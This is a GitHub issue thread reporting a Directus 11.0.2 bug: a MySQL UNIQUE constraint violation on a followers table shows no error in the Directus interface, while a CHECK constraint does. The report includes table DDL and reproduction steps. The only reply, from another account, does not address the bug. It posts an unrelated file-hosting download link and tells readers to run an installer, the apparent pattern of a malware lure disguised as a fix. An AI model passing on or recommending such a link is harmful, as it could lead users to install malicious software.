### ISSUE TITLE
UNIQUE Constraint Error Not Displayed in Directus Interface

### ISSUE THREAD

**Issue by pauserratgutierrez** [directus/directus#23565]
### Describe the Bug

In Directus 11.0.2, the UNIQUE constraint on combined columns in a MySQL database is not properly enforced or displayed in the Directus interface. While the constraint works correctly at the database level, preventing the insertion of duplicate records, Directus does not display any error when a duplicate follow relationship is attempted. The CHECK constraint (preventing a user from following themselves) works correctly and shows the error in Directus, but the UNIQUE constraint on the follower_id and followee_id combination does not surface the error in the Directus UI.

Expected Behavior: Both the CHECK and UNIQUE constraints should surface error messages in Directus when violated, ensuring that users are notified about why their action failed.

The CHECK constraint (check_no_self_follow) works as expected and the error is shown to the user in Directus. However, the UNIQUE constraint (unique_follow on follower_id and followee_id) prevents duplicate entries at the database level but does not display any error in the Directus interface.

See this video: 
https://github.com/user-attachments/assets/5498f9b2-fa45-497f-903f-9d131d65d7b6

### To Reproduce

1. Set up a followers table in MySQL with the following structure:
```
CREATE TABLE `followers` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `followee_id` char(36) DEFAULT NULL,
  `follower_id` char(36) DEFAULT NULL,
  `followed_at` timestamp NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `unique_follow` (`follower_id`, `followee_id`),
  CONSTRAINT `followers_followee_id_foreign` FOREIGN KEY (`followee_id`) REFERENCES `directus_users` (`id`) ON DELETE CASCADE,
  CONSTRAINT `followers_follower_id_foreign` FOREIGN KEY (`follower_id`) REFERENCES `directus_users` (`id`) ON DELETE CASCADE,
  CONSTRAINT `check_no_self_follow` CHECK (`followee_id` <> `follower_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
```
2. Attempt to create a follower item in Directus where a user follows themselves:
- This triggers the check_no_self_follow constraint, and an error is correctly displayed in the Directus interface.
3. Attempt to create a follower item where the same user follows the same other user multiple times:
- This violates the UNIQUE constraint on follower_id and followee_id but no error is displayed in Directus.
- The record is not inserted in the database (correct behavior due to the MySQL constraint), but no feedback is provided to the user in Directus.

### Directus Version

v11.0.2

### Hosting Strategy

Self-Hosted (Docker Image)

### Database

MySQL 8.0.39

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
